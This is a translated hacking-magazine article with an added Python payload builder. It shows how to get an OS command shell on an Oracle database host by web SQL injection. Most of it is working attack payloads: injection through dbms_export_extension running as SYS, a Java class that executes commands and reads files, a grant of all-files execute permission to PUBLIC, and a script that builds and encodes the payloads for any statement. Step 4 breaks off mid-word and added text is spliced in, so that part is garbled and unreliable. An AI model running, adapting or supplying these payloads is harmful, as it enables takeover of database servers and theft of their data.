A sharp Oracle injection technique
Originally published in 黑客手册
linx 2008.1.12
This article describes a way to obtain a command shell on the database host directly through Oracle SQL injection in a web application.
The demonstrations below are run in SQL*Plus (through a web front end). For web injection, rewrite each select sys.dbms_export_extension….. statement in the form
/xxx.jsp?id=1 and '1'<>'a'||(select sys.dbms_export_extension…..)
Because || binds tighter than <>, the condition compares '1' with 'a' followed by whatever the subquery returns. The two can never be equal, so the injected condition stays true and the page renders as before, while Oracle still has to evaluate the subquery, and evaluating it is what executes the injected PL/SQL.
The statements are fairly long, so they may have to be sent with POST.
The steps are as follows:
1. Create the package
By injecting into sys.dbms_export_extension.get_domain_index_tables (a definer-rights package owned by SYS and executable by PUBLIC; its third argument is concatenated unescaped into dynamically built PL/SQL, so the injected block runs as SYS; later Oracle Critical Patch Updates close this hole), create a Java class linxutil inside the database with two methods: runcmd executes an operating-system command and returns its output, readfile returns the contents of a file. The inner block is declared with pragma autonomous_transaction because DDL cannot otherwise run inside a query. Java is case-sensitive, so the class and method names inside the payload must keep their proper case even though the surrounding SQL does not care:
/xxx.jsp?id=1 and '1'<>'a'||(
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
create or replace and compile java source named "linxutil" as import java.io.*; public class linxutil extends Object {public static String runcmd(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String sTemp,str="";while ((sTemp = myReader.readLine()) != null) str +=sTemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readfile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String sTemp,str="";while ((sTemp = myReader.readLine()) != null) str +=sTemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';end;'';end;--','sys',0,'1',0) from dual
)
————————
If the URL length is limited, the readfile() method can be dropped, i.e.:
/xxx.jsp?id=1 and '1'<>'a'||(
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
create or replace and compile java source named "linxutil" as import java.io.*; public class linxutil extends Object {public static String runcmd(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String sTemp,str="";while ((sTemp = myReader.readLine()) != null) str +=sTemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';end;'';end;--','sys',0,'1',0) from dual
)
In that case also drop the statements in the later steps that deal with readfile().
——————————
2. Grant the Java permission
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';end;'';end;--','sys',0,'1',0) from dual
The permission and target names are case-sensitive. The execute action is what Runtime.exec needs for runcmd; if readfile is kept, the same permission also has to carry the read action, otherwise FileReader is refused by the Java security manager.
3. Create the functions
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
create or replace function linxruncmd(p_cmd in varchar2) return varchar2 as language java name ''''''''linxutil.runcmd(java.lang.String) return java.lang.String''''''''; '''';end;'';end;--','sys',0,'1',0) from dual
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
create or replace function linxreadfile(filename in varchar2) return varchar2 as language java name ''''''''linxutil.readfile(java.lang.String) return java.lang.String''''''''; '''';end;'';end;--','sys',0,'1',0) from dual
4. Grant PUBLIC execute permission on the functions
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''gran
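The hardest part of the steps above is keeping the single quotes straight: the innermost statement passes through three string literals (the autonomous block, the dbms_output".put(:p1) block, and the SQL literal handed to get_domain_index_tables), and every layer doubles the quotes of everything inside it, which is why 'PUBLIC' ends up as ''''''''PUBLIC''''''''. The following Python is an added example written for this edit, not code from the article: it builds the payload for any inner PL/SQL statement, wraps it in the and '1'<>'a'||(...) form, and URL-encodes it. The function names, the quote-parity sanity check and the /xxx.jsp?id=1 base URL (the article's placeholder) are assumptions of this example.

```python
# Added example (not from the original article): build the nested
# dbms_export_extension payload for an arbitrary inner PL/SQL statement.
from urllib.parse import quote


def pl_literal_escape(s: str) -> str:
    """Escape text for embedding inside a PL/SQL single-quoted literal."""
    return s.replace("'", "''")


def export_extension_payload(inner_stmt: str) -> str:
    """Return the SELECT that runs inner_stmt as SYS through
    sys.dbms_export_extension.get_domain_index_tables.

    Nesting, innermost to outermost:
      level 3: inner_stmt (the DDL or grant we actually want to run)
      level 2: declare pragma autonomous_transaction;begin execute immediate '<3>';end;
      level 1: dbms_output".put(:p1);execute immediate '<2>';end;--
      query  : '<1>' is the third argument of get_domain_index_tables
    Each embedding doubles the quotes of everything it contains, so a
    literal at level 3 is surrounded by eight quotes in the final query.
    """
    level2 = ("declare pragma autonomous_transaction;begin execute immediate '"
              + pl_literal_escape(inner_stmt) + "';end;")
    level1 = ('dbms_output".put(:p1);execute immediate \''
              + pl_literal_escape(level2) + "';end;--")
    return ("select sys.dbms_export_extension.get_domain_index_tables('foo','bar','"
            + pl_literal_escape(level1) + "','sys',0,'1',0) from dual")


def web_injection(base_url: str, inner_stmt: str) -> str:
    """Wrap the payload in the article's  and '1'<>'a'||( ... )  form and
    URL-encode it for a GET request (base_url is a hypothetical vulnerable
    parameter such as '/xxx.jsp?id=1').  'a'||<anything> never equals '1',
    so the condition stays true, but Oracle still evaluates the subquery,
    which is where the side effect happens."""
    suffix = " and '1'<>'a'||(" + export_extension_payload(inner_stmt) + ")"
    return base_url + quote(suffix, safe="")


def quotes_balanced(sql_text: str) -> bool:
    """Sanity check before sending: an odd number of single quotes can never
    form balanced literals, the usual symptom of a miscounted nesting level."""
    return sql_text.count("'") % 2 == 0


if __name__ == "__main__":
    # Step 3 of the article: bind linxruncmd to the Java method.
    stmt = ("create or replace function linxruncmd(p_cmd in varchar2) return varchar2 "
            "as language java name 'linxutil.runcmd(java.lang.String) return java.lang.String';")
    payload = export_extension_payload(stmt)
    assert quotes_balanced(payload)
    print(web_injection("/xxx.jsp?id=1", stmt))
```

The encoded string is long enough that, as the article notes, it usually has to go in a POST body rather than the query string; the builder only takes care of the quoting, the transport is up to you.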